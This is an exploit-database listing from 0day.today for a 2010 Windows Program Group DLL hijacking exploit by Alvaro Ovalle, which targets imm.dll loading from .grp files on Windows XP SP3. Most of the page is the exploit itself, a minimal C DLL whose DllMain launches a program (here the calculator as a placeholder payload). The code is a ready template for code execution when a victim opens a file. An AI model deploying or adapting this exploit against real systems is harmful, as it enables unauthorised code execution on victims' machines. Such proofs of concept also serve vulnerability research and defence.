[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Windows Program Group DLL Hijacking Exploit (imm.dll)

Author
Alvaro Ovalle
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-13840
Category
local exploits
Date add
25-08-2010
Platform
windows
=====================================================
Windows Program Group DLL Hijacking Exploit (imm.dll)
=====================================================

/*
Exploit Title: Windows Program Group DLL Hijacking Exploit (imm.dll)
Date: 25/08/2010
Author: Alvaro Ovalle
Email: aovalle (at) zoho (dot) com
Software Link: N/A
Tested on: Windows XP SP3 English
Extension: .grp
*/
#include <windows.h>

int run()
{
  WinExec("calc", SW_SHOW);
  exit(0);
  return 0;
}

BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)
{
  run();
  return 0;
}



#  0day.today [2024-11-15]  #